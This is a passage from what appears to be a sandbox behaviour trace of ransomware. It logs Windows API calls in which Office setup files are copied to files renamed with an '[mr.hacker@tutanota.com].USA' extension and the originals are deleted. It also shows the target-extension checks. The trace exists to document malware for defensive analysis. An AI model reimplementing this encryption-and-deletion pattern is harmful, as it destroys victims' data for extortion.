dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.266] GetLastError () returned 0x0 [0037.266] ReadFile (in: hFile=0x1d0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x73c, lpOverlapped=0x0) returned 1 [0037.276] WriteFile (in: hFile=0x1c4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x740, lpOverlapped=0x0) returned 1 [0037.277] ReadFile (in: hFile=0x1d0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.277] WriteFile (in: hFile=0x1c4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.277] SetEndOfFile (hFile=0x1c4) returned 1 [0037.277] CloseHandle (hObject=0x1c4) returned 1 [0037.278] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.278] SetEndOfFile (hFile=0x1d0) returned 1 [0037.279] CloseHandle (hObject=0x1d0) returned 1 [0037.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.279] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 1 [0037.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.279] lstrlenW (lpString=".doc") returned 4 [0037.279] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.279] lstrlenW (lpString=".docx") returned 5 [0037.280] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.280] lstrlenW (lpString=".pdf") returned 4 [0037.280] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString=".xls") returned 4 [0037.280] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString=".xlsx") returned 5 [0037.280] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.280] lstrlenW (lpString=".ppt") returned 4 [0037.280] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.280] lstrlenW (lpString=".zip") returned 4 [0037.280] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.280] lstrlenW (lpString=".rar") returned 4 [0037.280] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString=".bz2") returned 4 [0037.280] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString=".7z") returned 3 [0037.280] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.280] lstrlenW (lpString=".dbf") returned 4 [0037.280] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.280] lstrlenW (lpString=".1cd") returned 4 [0037.280] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.280] lstrlenW (lpString=".jpg") returned 4 [0037.280] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.280] lstrlenW (lpString=".doc") returned 4 [0037.280] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.280] lstrlenW (lpString=".docx") returned 5 [0037.281] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.281] lstrlenW (lpString=".pdf") returned 4 [0037.281] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.281] lstrlenW (lpString=".xls") returned 4 [0037.281] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.281] lstrlenW (lpString=".xlsx") returned 5 [0037.281] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.281] lstrlenW (lpString=".ppt") returned 4 [0037.281] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.281] lstrlenW (lpString=".zip") returned 4 [0037.281] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.281] lstrlenW (lpString=".rar") returned 4 [0037.281] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.281] lstrlenW (lpString=".bz2") returned 4 [0037.281] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.281] lstrlenW (lpString=".7z") returned 3 [0037.281] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.281] lstrlenW (lpString=".dbf") returned 4 [0037.281] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.281] lstrlenW (lpString=".1cd") returned 4 [0037.281] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0037.281] lstrlenW (lpString=".jpg") returned 4 [0037.281] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.281] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0037.281] lstrlenW (lpString="OCT.CHM") returned 7 [0037.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.287] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=71236) returned 1 [0037.287] CloseHandle (hObject=0x1cc) returned 1 [0037.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 0x20 [0037.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.287] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.288] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0037.288] GetLastError () returned 0x0 [0037.288] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x11644, lpOverlapped=0x0) returned 1 [0037.291] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x11650, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x11650, lpOverlapped=0x0) returned 1 [0037.293] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.293] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe2, lpOverlapped=0x0) returned 1 [0037.294] SetEndOfFile (hFile=0x1a8) returned 1 [0037.294] CloseHandle (hObject=0x1a8) returned 1 [0037.295] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.295] SetEndOfFile (hFile=0x1cc) returned 1 [0037.296] CloseHandle (hObject=0x1cc) returned 1 [0037.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.296] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 1 [0037.296] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.297] lstrlenW (lpString=".doc") returned 4 [0037.297] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0037.297] lstrlenW (lpString=".docx") returned 5 [0037.297] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0037.297] lstrlenW (lpString=".pdf") returned 4 [0037.297] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0037.297] lstrlenW (lpString=".xls") returned 4 [0037.297] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0037.297] lstrlenW (lpString=".xlsx") returned 5 [0037.297] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0037.297] lstrlenW (lpString=".ppt") returned 4 [0037.297] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0037.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.297] lstrlenW (lpString=".zip") returned 4 [0037.297] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0037.297] lstrlenW (lpString=".rar") returned 4 [0037.297] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0037.297] lstrlenW (lpString=".bz2") returned 4 [0037.297] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0037.297] lstrlenW (lpString=".7z") returned 3 [0037.297] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0037.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.297] lstrlenW (lpString=".dbf") returned 4 [0037.297] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0037.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.297] lstrlenW (lpString=".1cd") returned 4 [0037.297] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0037.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.297] lstrlenW (lpString=".jpg") returned 4 [0037.297] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0037.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.316] lstrlenW (lpString=".doc") returned 4 [0037.316] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0037.316] lstrlenW (lpString=".docx") returned 5 [0037.316] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0037.316] lstrlenW (lpString=".pdf") returned 4 [0037.316] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0037.316] lstrlenW (lpString=".xls") returned 4 [0037.316] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0037.316] lstrlenW (lpString=".xlsx") returned 5 [0037.316] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0037.316] lstrlenW (lpString=".ppt") returned 4 [0037.316] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0037.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.316] lstrlenW (lpString=".zip") returned 4 [0037.316] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0037.316] lstrlenW (lpString=".rar") returned 4 [0037.316] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0037.316] lstrlenW (lpString=".bz2") returned 4 [0037.316] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0037.316] lstrlenW (lpString=".7z") returned 3 [0037.316] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0037.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.317] lstrlenW (lpString=".dbf") returned 4 [0037.317] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0037.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.317] lstrlenW (lpString=".1cd") returned 4 [0037.317] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0037.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0037.317] lstrlenW (lpString=".jpg") returned 4 [0037.317] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0037.317] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.317] lstrlenW (lpString="OfficeMUI.XML") returned 13 [0037.317] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.318] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=5557) returned 1 [0037.318] CloseHandle (hObject=0x1cc) returned 1 [0037.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 0x20 [0037.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.318] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.318] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0037.319] GetLastError () returned 0x0 [0037.319] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x15b5, lpOverlapped=0x0) returned 1 [0037.320] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0037.321] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.321] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xee, lpOverlapped=0x0) returned 1 [0037.321] SetEndOfFile (hFile=0x1a8) returned 1 [0037.322] CloseHandle (hObject=0x1a8) returned 1 [0037.322] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.322] SetEndOfFile (hFile=0x1cc) returned 1 [0037.323] CloseHandle (hObject=0x1cc) returned 1 [0037.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.323] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 1 [0037.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.323] lstrlenW (lpString=".doc") returned 4 [0037.323] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.323] lstrlenW (lpString=".docx") returned 5 [0037.324] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.324] lstrlenW (lpString=".pdf") returned 4 [0037.324] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString=".xls") returned 4 [0037.324] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString=".xlsx") returned 5 [0037.324] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.324] lstrlenW (lpString=".ppt") returned 4 [0037.324] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.324] lstrlenW (lpString=".zip") returned 4 [0037.324] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.324] lstrlenW (lpString=".rar") returned 4 [0037.324] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString=".bz2") returned 4 [0037.324] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString=".7z") returned 3 [0037.324] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.324] lstrlenW (lpString=".dbf") returned 4 [0037.324] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.324] lstrlenW (lpString=".1cd") returned 4 [0037.324] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.324] lstrlenW (lpString=".jpg") returned 4 [0037.324] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.324] lstrlenW (lpString=".doc") returned 4 [0037.324] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.324] lstrlenW (lpString=".docx") returned 5 [0037.324] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.325] lstrlenW (lpString=".pdf") returned 4 [0037.325] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.325] lstrlenW (lpString=".xls") returned 4 [0037.325] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.325] lstrlenW (lpString=".xlsx") returned 5 [0037.325] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.325] lstrlenW (lpString=".ppt") returned 4 [0037.325] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.325] lstrlenW (lpString=".zip") returned 4 [0037.325] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.325] lstrlenW (lpString=".rar") returned 4 [0037.325] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.325] lstrlenW (lpString=".bz2") returned 4 [0037.325] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.325] lstrlenW (lpString=".7z") returned 3 [0037.325] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.325] lstrlenW (lpString=".dbf") returned 4 [0037.325] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.325] lstrlenW (lpString=".1cd") returned 4 [0037.325] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0037.325] lstrlenW (lpString=".jpg") returned 4 [0037.325] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.325] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.325] lstrlenW (lpString="OfficeMUISet.XML") returned 16 [0037.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.326] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=819) returned 1 [0037.326] CloseHandle (hObject=0x1cc) returned 1 [0037.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 0x20 [0037.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 